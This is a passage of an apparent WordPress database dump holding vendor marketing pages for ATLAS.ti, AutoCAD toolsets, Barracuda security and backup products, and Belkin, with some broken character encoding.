hundreds of documents, audio clips or photos, ATLAS.ti will never let you down!\r\n\r\nWork withÂ <strong>text documents in all major formats</strong>â€“including txt,.doc, .docx, .odt, and, of course, .pdf. Perform fully automated searches across one or multiple documents, auto-coding, and other powerful semantic operations to extract meaning.\r\n\r\nEnjoy the freedom of working withÂ <strong>dozens of graphic and audio formats</strong>Â (.wav, ,mp3, .wma, etc.) as well as most common video types (.avi, .mp4, .wmv, etc.).\r\n\r\nYou canÂ <strong>import data from Evernote, Twitter,</strong>Â and your favorite Reference Manager for aÂ <strong>literature review</strong>Â . OrÂ <strong>import entire surveys</strong>Â to analyze answers to open-ended questions.\r\n\r\n&nbsp;\r\n<h3 id=\"Explore-Material-In-Great-Depth\">Explore Material In Great Depth</h3>\r\nGet to know your material in tremendous depth. Code systematically and develop aÂ <strong>system of meaning</strong>Â that unlocks your specific research subject.Â <strong>Explore</strong>Â your data with the Network Editor, the Text Search Tool, word clouds, word frequency tables, and through the various query options.\r\n\r\nThese tools will help you toÂ <strong>discover</strong>Â the intricate hidden â€œtextureâ€ of your data, its interwoven meanings.\r\n\r\n&nbsp;\r\n<h3 id=\"Powerful-Tool-set\">Powerful Tool set</h3>\r\nATLAS.ti offers a set of tools and features that are powerful and flexible enough to get to the bottom of even the most complex data material.\r\n\r\nYour central workspace in ATLAS.ti serves as a container for your projectâ€™s data. Access to all basic project components such as your documents, highlighted/coded data segments, codes, memos, hyperlinks, groups, or networks is fast and comfortable.\r\n\r\n<strong>Coding</strong>Â can be done by simply dragging codes onto the selected piece of data. Object Managers, the Project Explorer, and the Co-occurrence Explorer let you browse and navigate through your project data.\r\n\r\n<strong>Link</strong>Â your findings in aÂ <strong>semantically meaningful way</strong>.\r\n\r\n<strong>Visualize</strong>Â your findings and interpretations in a digital mind map as you go.\r\n\r\n&nbsp;\r\n<h3 id=\"Unique-Features\">Unique Features</h3>\r\nTheÂ <strong>interactive margin area</strong>Â is a unique work space in ATLAS.ti not surpassed by any other program on the market. It permits a uniquely intuitive way of interacting with your data, digitally transferring the traditional paper-and-pen analogy in the digital world.\r\n\r\nTheÂ <strong>quotation level</strong>Â is also radically unique to ATLAS.ti. If offers an analytic level below coding and better supports inductive, interpretive research approaches like grounded theory, hermeneutic, discourse analysis, sociology of knowledge, or phenomenology than any other software.\r\n\r\nThis can also be said about the ATLAS.tiÂ <strong>network / visualization</strong>Â function. It offers the most integrated way of working with your data, it is a tool for visualization as well as for analysis, for data organization as well as conceptual level analytic work and data presentation.\r\n\r\nBecause of the way ATLAS.ti manages data under the hood, it allows for handling muchÂ <strong>larger projects</strong>Â than other products: ATLAS.ti handle projects that contain thousands of documents and/or tens of thousands of coded data segments.\r\n\r\n&nbsp;\r\n<h3 id=\"Team-Work\">Team Work</h3>\r\nATLAS.ti supportsÂ <strong>collaborative work</strong>Â in several highly effective ways. Dedicated tools as well as some general principles of the software make collaborations a breeze.\r\n\r\n&nbsp;\r\n<h3 id=\"Long-Data-Lifespan\">Long Data Lifespan</h3>\r\nTo supportÂ <strong>multi-method multi-user projects across space and time (longitudinal studies)</strong>, project data export using XML is available. With XML, the proprietary nature of most software systems can be mitigated. This is indeed a mandatory need in scientific settings. ATLAS.tiâ€™s dedicated XML schema influenced the development of theÂ QuDEXÂ language for the purpose of archiving qualitative data.\r\n\r\n&nbsp;\r\n<h3 id=\"Great-User-Support\">Great User Support</h3>\r\nATLAS.ti comes withÂ <strong>unsurpassed service</strong>Â andÂ <strong>multiple sources of support</strong>. Get a first overview of the software during one of ourÂ free webinarÂ hold in different languages.\r\n\r\n&nbsp;\r\n<h3>Instructional material</h3>\r\nOurÂ Quick TourÂ and the many videos on ourÂ YouTube channelÂ will help you to quickly master the software.\r\n\r\n&nbsp;\r\n<h3>Support Center</h3>\r\nIf you have questions not covered, you can write to ourÂ Support CenterÂ twenty-four hours a day, or call ourÂ telephone supportÂ during office hours.\r\n\r\nOurÂ <strong>Support Center</strong>Â lets you conveniently contact our developers and our competent support staff via a state-of-the-art helpdesk system, guaranteeing swift turnaround and short response times.\r\n\r\n&nbsp;\r\n<h3>Shared Expertise</h3>\r\nFurther, peer-to-peer support is available through theÂ <strong>ATLAS.ti User Forum</strong>Â with thousands of members. TheÂ ATLAS.ti Research BlogÂ offers a range of articles written by ATLAS.ti users world-wide in a large variety of topics.\r\n\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/guyThxVJj2w\" width=\"932\" height=\"524\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','ATLAS.ti','','publish','closed','closed','','atlas-ti','','','2019-09-18 16:21:07','2019-09-18 08:21:07','',0,'https://bintara.com.my/?page_id=1443',0,'page','',0),(1444,1,'2018-12-11 12:58:01','2018-12-11 04:58:01','<div class=\"grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pb-20 wd-bbw-1 wd-bc-smoke\">\r\n<div class=\"column-content parsys\">\r\n<div>\r\n<div class=\"heading section\">\r\n<h1 class=\"wd-font-40 wd-bold wd-color-white wd-uppercase\">Autodesk</h1>\r\n</div>\r\n<div class=\"text section\">\r\n\r\nAutodesk, Inc., is a leader in 3D design, engineering and entertainment software. Since its introduction of AutoCAD software in 1982, Autodesk continues to develop the broadest portfolio of Build &amp; Design software for global markets.\r\n\r\nCustomers across the manufacturing, architecture, building, construction, media and entertainment industries â€” including the last 21 Academy Award winners for Best Visual Effects â€” use Autodesk software to design, visualize, and simulate their ideas before they\'re ever built or created. From blockbuster visual effects and buildings that create their own energy, to electric cars and the batteries that power them, the work of our 30 software customers is everywhere you look.\r\n\r\n&nbsp;\r\n<h2></h2>\r\n</div>\r\n</div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"500\" height=\"55\" /></div>\r\n<div class=\"heading section\">\r\n<h3 class=\"wd-normal wd-uppercase wd-color-gray-25 wd-font-34 wd-mt-16 wd-mb-0\">ONLY ONE. AUTOCAD.</h3>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pt-20\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-mt-0 wd-mb-12 wd-font-19 wd-color-gray-40\">From mechanical design aids to architecture tools to model-based GIS and mapping features, subscribe to AutoCAD software and access industry-specific toolsets, plus web and mobile apps.</p>\r\n\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h3 class=\"pc-brand wd-light wd-font-30\">Work faster with specialized toolsets</h3>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">AutoCAD now includes industry-specific features and libraries for architecture, mechanical design, electrical design, and more.</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate floor plans, sections, elevations, and other drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Draw piping, plumbing, and ducting for faster design with mechanical tools.</li>\r\n 	<li class=\"wd-font-16\">Design ductwork, electrical conduit, and circuiting for HVAC, plumbing, and electrical with MEP (mechanical, electrical, and plumbing).</li>\r\n</ul>\r\n&nbsp;\r\n<div class=\"heading section\">\r\n<h3 class=\"pc-brand wd-light wd-font-30\">Take your work with you with AutoCAD web and mobile apps</h3>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">With a single AutoCAD subscription, work anywhere and stay connected to your DWGâ„¢ files on any platformâ€”desktop, web, or mobile. Easily move data and drawings between your desktop, web browser, and phone.</p>\r\n\r\n</div>\r\n</div>\r\n<div class=\"wd-mb-16 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h3 class=\"pc-brand wd-light wd-font-30\">What\'s included</h3>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-7 grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-bbw-1-sm wd-bc-smoke wd-pb-24-sm\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mt-0 wd-mb-16 wd-font-19\">Specialized toolsets offer industry-specific features to help you design more quickly and easily:</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create details, views, and more.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate tasks and annotations.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use a rules-driven workflow to enforce industry standards and generate schedules, lists, and tables.</li>\r\n 	<li class=\"wd-font-16\">Access libraries of symbols, parts, and detail components.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"text section\">\r\n<div class=\"text section\">\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<h2></h2>\r\n<h4><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></h4>\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">The original AutoCAD 2D and 3D CAD software provides innovative tools for design and documentation.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create and edit 2D geometry and 3D models with solids, surfaces, and mesh objects.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Annotate drawings with text, dimensions, leaders, and tables.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize the ribbon and tool palettes.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize with add-on apps and APIs.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Extract object data to tables.</li>\r\n 	<li class=\"wd-font-16\">Attach and import data from PDF files.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-architecture-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features for architectural drawing, documentation, and schedules, and for automating drafting tasks.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create floor plans, sections, elevations, and other building design drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Additional features include walls, door, and windows.</li>\r\n 	<li class=\"wd-font-16\">Use 8,000+ intelligent architectural objects and styles to support AIA 2nd edition, BS1192 DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-electrical-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds electrical design features to help you create, modify, and document electrical controls systems.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create panel layouts, schematic diagrams, and other electrical drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use consistent project standards with drawings organized in a project-based structure.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 65,000+ intelligent electrical symbols to support AS, GB, IEC, IEC-60617, JIC, JIS, NFPA, and IEEE standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-map-3d-2019-lockup-460x47.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Incorporate GIS topology with AutoCAD so you can use and maintain CAD and GIS data for planning, design, and data management.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create, maintain, and communicate mapping and GIS information within the AutoCAD drawing environment.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to manage GIS data and aggregate it with design data.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Access spatial data stored in files, databases, and web services.</li>\r\n 	<li class=\"wd-font-16\">Use standard data schema, automated business workflows, and report templates for Electric North America, Electric Europe, Water, Wastewater, and Gas industries.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mechanical-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds a library of standards-based parts and tools to help you create, modify, and document mechanical designs for manufacturing.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate mechanical engineering tasks, such as generating machine components, dimensioning, and creating bills of material.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create parts, assemblies, and other drawings for product design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Use 700,000+ intelligent manufacturing parts, features, and symbols to support ISO, ANSI, DIN, JIS, BSI, CSN, and GB standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mep-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you draft, design, and document MEP building systems in an AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create accurate construction documentation of MEP systems design.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to create MEP drawings for building systems.</li>\r\n 	<li class=\"wd-font-16\">Use 10,500+ intelligent MEP objects to support AIA 2nd edition, BS1192 Descriptive, and BS1192 â€“ AUG Version 2 standards, and DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-plant-3d-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you produce P&amp;IDs, and then integrate them into a 3D plant design model.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Generate and share isometrics, orthographics, and materials reports.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create schematic diagrams, plant layouts, and other drawings for plant design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 400+ intelligent plant objects such as equipment templates, support templates, and structural members to support 40 standards, including ANSI and DIN.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-raster-design-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds raster-to-vector tools to help you convert raster images into DWGâ„¢ objects. Edit scanned drawings in a familiar AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Despeckle, bias, mirror, and touch up your images.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use standard AutoCAD commands on raster regions and primitives. Easily erase raster images, lines, arcs, and circles.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create lines and polylines from raster images, and convert raster files into vector drawings.</li>\r\n 	<li class=\"wd-font-16\">Show and analyze geo images in Civil 3D civil engineering software and the AutoCAD Map 3D toolset.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-lockups-banners/2019/autocad-web-app-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Access AutoCAD from any computer.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">View, create, and edit AutoCAD drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Work on the latest drawings from anywhere.</li>\r\n 	<li class=\"wd-font-16\">Access updates in real time.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Autodesk','','publish','closed','closed','','autodesk','','','2019-09-18 16:23:42','2019-09-18 08:23:42','',0,'https://bintara.com.my/?page_id=1444',0,'page','',0),(1445,1,'2018-12-11 12:56:36','2018-12-11 04:56:36','<p><strong>Barracuda\'s</strong> wide range of high-performance network solutions are specifically designed to protect your threat vectors no matter where they reside. Whether it is a website, email, web application, or mobile device, Barracuda has the tools necessary for you to secure and optimize your network perimeter.</p><h2>Email Protection</h2><p>Over 75% of targeted cyber-attacks start with an email. Email-borne attacks interrupt business operations, cause financial damage, and compromise business integrity. Barracuda protects you with multiple layers of protection that includes all aspects of your email infrastructure including gateway defense, email resiliency, fraud protection, and user security awareness.</p>https://youtu.be/HuMxGXS6IxE<h2><strong>Next-Generation Email Security</strong></h2><p>As email-borne attacks have become more prevalent and sophisticated, traditional email security gateways can no longer protect users and data. Many threats, such as spear phishing attacks or emails directed at users via their personal email, bypass gateways.</p><p>While a secure gateway is still necessary, complete email protection also requires a multi-layered defense that stops advanced attacks and protects email data. Barracuda is the only company that combines award-winning email security that can identify phishing emails with user awareness training, archiving, and backup.</p>https://youtu.be/ds9fjUyPyoY<h2>Network and Application Security</h2><p>Barracuda Cloud Generation network and application firewalls are the industry\'s first solutions purpose-built for cloud connected, on-premises, and hybrid networks. Barracuda protect all your users, applications, and data â€“ regardless of what your infrastructure looks like. We ensure secure and reliable connections among multiple sites on premises and the cloud with consumption-based pricing, saving you money on infrastructure costs.</p><h2><strong>Moving from the Data Center to the Public Cloud</strong></h2><p>When you migrate your applications to the public cloud, traditional on-premises firewall functionality often doesnâ€™t translate well to public cloud environments. Cloud Generation Firewalls are designed to provide support for public cloud deployment best practices, support public cloud specific use cases and facilitate you with a commercial model designed for public cloud consumption.</p><h2>Data Protection</h2><p>Barracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.</p><h2>Barracuda Backup</h2><p>Cloud-integrated protection for business-critical data wherever it resides</p><h2>Cloud-to-Cloud Backup</h2><p>Cloud-based backup and recovery to protects Office 365 emails and data from accidental and malicious data loss</p><h2>Donâ€™t Be a Ransomware Victim</h2><h4>Ransomware is on the rise. Barracudaâ€™s multi-layered defense protects your data (and your money).</h4><h2>Understanding Ransomware</h2><p>Ransomware is a type of malware that lets attackers find and encrypt your most important data. They then offer to provide the decryption key only if you pay a ransom, within a short time. This is the number one IT security challenge that you face today, with resource-limited small and mid-size businesses the most likely targets.</p><p>Cybercriminals exploit a variety of threat vectors, including email, network traffic, user behavior, and application traffic to insert ransomware. Without a comprehensive security strategy that secures all these vectors, you are almost certain to become a victim.</p><ul><li>47% of businesses have been affected by ransomware.</li><li>The FBI reports that $209 million was paid to ransomware criminals in the first quarter of 2016.</li><li>59% of ransomware infections are delivered via email attachments and embedded URLs.</li></ul>https://youtu.be/zNkTopX68tk<h5>Barracuda provides a complete family of solutions that work together to help you detect, prevent, and recover from ransomware attacks.</h5>		\n			<h2>Detect</h2>		\n		<p>Detect ransomware and other advanced threats, using automated online threat scanners (offered at no charge) and advanced, multi-layer detection technologies including sandbox analysis.</p>		\n			<h2>Prevent</h2>		\n		<p>Prevent them from infecting your systems, thanks to best-of-breed products to secure your network perimeter, email, web traffic, and outward-facing web applications.</p>		\n			<h2>Recover</h2>		\n		<p>Recover quickly and easily in case attackers are successful, with state-of-the-art backup solutions that leave attackers with nothing, while you get right back to business.</p><h2>Why is Backup Necessary for Office 365?</h2><p>The number one cause of data loss in a SaaS deployment, such as Microsoft Office 365, is accidental data deletion. In fact, about 70 percent of all lost data is due to either accidental or malicious deletion of data by end-users. Other ways that data can be lost include misconfiguration, client sync issues, and most recently the widespread presence of malware and ransomware, which can render data unusable.</p><p>Although Microsoft Office 365 provides some basic recovery options with the recycle bin and email retention, Microsoftâ€™s primary focus within Office 365 is ensuring that service and data availability are not disrupted. It is your responsibility to protect the data that you store in the Office 365 cloud. Barracuda Cloud-to-Cloud Backup provides comprehensive, cost-effective, and scalable protection of your Office 365 data â€“without adding to your infrastructure costs.</p><h2>What We Protect</h2><p>Barracudaâ€™s Cloud-to-Cloud Backup Service backs up all of your Office 365 data to secure Barracuda Cloud Storage with no need for on-premises infrastructure. You can back up data on demand or according to an automated schedule. All Exchange Online, SharePoint Online, and OneDrive for Business data is deduplicated and compressed for maximum storage efficiency and reduced backup windows before being stored in the Barracuda Cloud.</p><p>Exchange Online. Barracuda protects the complete folder structure of each userâ€™s mailbox including all email message and attachments.<br />OneDrive for Business. All files and folders under the Documents Library are protected.<br />SharePoint Online. We protect SharePoint data including Document Libraries, Site Assets, and Picture Libraries within both Team Sites and Public Sites are protected.</p><h2>Fast and Easy Recovery Options</h2><p>All Office 365 data backed up to the Barracuda Cloud is accessible, searchable, and retrievable from anywhere with an Internet connection. Data can be recovered from the site level down to the individual item level. Messages, folders, or even entire mailboxes and be restored back to the original user and location, to a different location within the account, or to a completely different user account. You can also download items for offline use.</p><p>If youâ€™re looking for a specific file or message but are unsure of its location, the search feature can be used to find the item quickly and easily. You can also recover data to a specific point in time by selecting the specific dates from a built-in calendar. Recovered data is compressed to minimize download times.</p><h2>Powerful Reporting and Statistics</h2><p>For IT Administrators, detailed reporting and audit logging are a key component of a backup solution. Barracuda Cloud-to-Cloud Backup provides backup status and health monitoring for each backup source. Automated email alerts are delivered after each backup to specified email recipients containing a summary of the backup and detailed information about which email messages, folders, and files were added, modified, and removed since the last backup.</p><p>On the Status page, graphs show the number of items added and amount of data backed up each day. Storage statistics and graphs detail how much data has been backed up overall and the storage efficiency, as well as how much data is actually being stored in the Barracuda Cloud after deduplication and compression. An Audit Log tracks and provides details about every action performed within the Cloud-to-Cloud Backup interface.</p>','Barracuda','','publish','closed','closed','','barracuda','','','2019-09-24 12:41:50','2019-09-24 04:41:50','',0,'https://bintara.com.my/?page_id=1445',0,'page','',0),(1446,1,'2018-12-11 12:56:46','2018-12-11 04:56:46','<h2>THE BELKIN DIFFERENCE</h2>\n<h4>&nbsp;</h4>\n<h3>Innovation, with quality at its core</h3>\n<p>For 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.</p>\n<h3>Global leader in tech.</h3>\n<p>With two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.</p>\n<h3>Always looking to the future</h3>\n<p>Technology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure weâ€™re ready and youâ€™re covered, no matter what the future holds.</p>\n<h3>An unwavering commitment to earning your trust.</h3>\n<p>Our rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work â€“ thatâ€™s why we back our products with robust warranties.</p>\n<h3>Unmatched performance, every time</h3>\n<p>We know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.</p>\n<h3>We believe good design 